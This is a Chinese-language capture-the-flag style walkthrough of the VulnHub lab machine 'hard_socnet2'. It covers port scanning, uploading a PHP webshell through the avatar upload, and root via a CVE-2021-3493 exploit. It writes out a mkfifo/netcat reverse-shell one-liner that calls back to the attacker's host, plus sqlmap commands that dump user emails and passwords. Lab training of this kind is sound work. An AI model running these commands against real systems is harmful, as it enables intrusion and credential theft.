靶機介紹
1)靶機地址:https://download.vulnhub.com/boredhackerblog/hard_socnet2.ova
2)靶機難度:高
3)打靶目標: 取得 root 權限
4)涉及攻擊方法:主機發現、埠掃描、SQL注入、檔案上傳、蟻劍上線、CVE-2021-3493、XMLRPC、逆向工程、動態除錯、緩沖區溢位、漏洞利用代碼撰寫
5)課程來源:https://www.aqniukt.com/goods/show/2434?targetId=16289&preview=0
6)參考連接:https://docs.python.org/zh-cn/3/library/xmlrpc.html
打靶程序
1)主機發現
# arp-scan -l

2)對主機進行全埠掃描
# nmap -p- 192.168.56.112

3)對發現的埠進行服務版本掃描
# nmap -p22,80,8000 -sV 192.168.56.112

4)對8000埠進行訪問,發現錯誤代碼為501,提示請求方法錯誤,不支持GET方法
瀏覽器:http://192.168.56.112:8000/

5)通過burp抓取訪問該頁面的資料包,修改請求方法為OPTIONS、POST、DELETE、PUT等,都無法回傳正常的頁面

6)此時訪問80埠,顯示一個登錄程式:利用萬能密碼無法正確登入,同時因不知道email賬號,導致無法暴力破解密碼,但是此處提供了注冊功能,可進行注冊
http://192.168.56.112:80

7)對網站進行賬號注冊,注冊完成后進行登錄,先對網站進行基本功能的了解

注:在實際滲透測驗程序中,利用注冊功能進行注冊時,要使用虛假的注冊資訊,不要使用個人真實資訊
8)登錄成功后,可以發表資訊,同時發現該程式存在admin和testuser用戶,但為發現該用戶的郵箱地址,因此無法直接登錄

9)在Profile發現,可以上傳用戶頭像,測驗嘗試直接上傳shell.php一句話木馬,發現可以直接上傳成功,復制圖片鏈接后,通過蟻劍進行連接

10)直接通過蟻劍進行連接,突破邊界,獲取到shell


11)提權:先進行資訊搜集,查看作業系統的版本和內核版本,發現ubuntu版本為18.04
# uname -a
#lsb_release -a

12)Ubuntu存在一個提權漏洞:CVE-2021-3493
漏洞利用代碼:https://github.com//briskets//CVE-2021-3493
①將漏洞利用代碼下載,并通過蟻劍上傳至目標主機

②在目標主機進行代碼編譯,并執行
# gcc -o exp exploit.c
# chmod +x exp
# ./exp

注:可以發現雖然提權成功,但是因為蟻劍的原因,導致自動的將高權限的shell退出了
③利用nc在目標系統上進行反彈shell,此處查看發現目標主機nc也沒有-e引數,所以可以使用nc串聯的方式反彈shell,此處通過作業系統的mkfifo命令進行反彈shell
kali主機:
# nc -lvvp 3333
目標主機:
#rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.56.103 3333 >/tmp/f
④反彈成功后,將反彈獲得的shell進行升級,并執行exp,獲取到root權限
$ python -c "import pty;pty.spawn('/bin/bash')"
$ ./exp
# id

13)其他漏洞(SQL注入)
①作為滲透測驗者,每當看見一個表單的時候,會習慣性的在其中輸入單引號,雙引號等字符,來嘗試測驗目標服務器端是否存在sql注入漏洞,在靶機web頁面最上方搜索欄的位置就是一個表單,當注入單引號時,回傳了錯誤資訊

②在搜索欄輸入字符搜索時,通過burp抓取資料包

③將抓取的資料包,賦值至一個文本檔案,如data.txt

④通過SQLmap對該資料包中的quera引數進行注入攻擊
# sqlmap -r data.txt -p query
# sqlmap -r data.txt -p query --dbs
# sqlmap -r data.txt -p query -D socialnetwork --tables
# sqlmap -r data.txt -p query -D socialnetwork -T users --columns
# sqlmap -r data.txt -p query -D socialnetwork -T users -C user_email,user_password --dump

⑤通過獲取到的管理員賬號密碼進行登錄:登錄之后暫未發現其他有價值的東西,但同樣可以在上傳頭像位置上傳webshell,同樣使用蟻劍上線

注:因本次提權漏洞(CVE-2021-3493)是2021年才發現的漏洞,但是靶機是2020年推出的,當時無法直接通過提權漏洞(CVE-2021-3493)進行提權,所以需要按照靶機作者設計靶機時的漏洞利用方法思路進行提權,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/539768.html
標籤:其他
下一篇:什么是CodeArts?
